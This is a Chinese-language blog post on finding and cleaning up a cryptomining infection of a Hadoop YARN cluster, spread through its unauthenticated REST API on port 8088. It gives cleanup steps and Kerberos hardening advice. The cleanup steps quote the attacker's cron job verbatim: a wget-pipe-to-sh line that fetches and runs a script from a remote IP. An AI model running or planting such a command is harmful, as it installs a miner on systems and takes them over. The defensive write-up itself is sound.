現象：

yarn一直在跑一個用戶為dr.who的application

訪問yarn:8088頁面發現一直有任務在跑如圖：

用戶為dr.who，問下內部使用人員，都沒有任務在跑；

結論：

恭喜你，你中毒了，攻擊者利用Hadoop Yarn資源管理系統REST API未授權漏洞對服務器進行攻擊，攻擊者可以在未授權的情況下遠程執行代碼的安全問題進行預警

用top命令發現cpu使用了360%多，系統會很卡。

解決辦法：

1，通過查看佔用cpu高得進程，kill掉此進程

2，檢查/tmp和/var/tmp目錄，刪除java、ppc、w.conf等異常文件

3 ，通過crontab -l 查看有一個* * * * * wget -q -O - http://46.249.38.186/cr.sh | sh > /dev/null 2>&1任務，刪除此任務

4，排查YARN日誌，確認異常的application，刪除處理

再通過top驗證看是否還有高cpu進程，如果有，kill掉，沒有的話應該正常了。

注意：YARN提供有默認開放在8088和8090的REST API（默認前者）允許用戶直接通過API進行相關的應用創建、任務提交執行等操作，如果配置不當，REST API將會開放在公網導致未授權訪問的問題，那麼任何黑客則就均可利用其進行遠程命令執行，從而進行挖礦等行為，黑客直接利用開放在8088的REST API提交執行命令，來實現在服務器內下載執行.sh腳本，從而再進一步下載啟動挖礦程序達到挖礦的目的，因此注意並啟用Kerberos認證功能，禁止匿名訪問修改8088端口。

閱讀更多 雪爺賞梁山 的文章

關鍵字: Hadoop 比特 黑客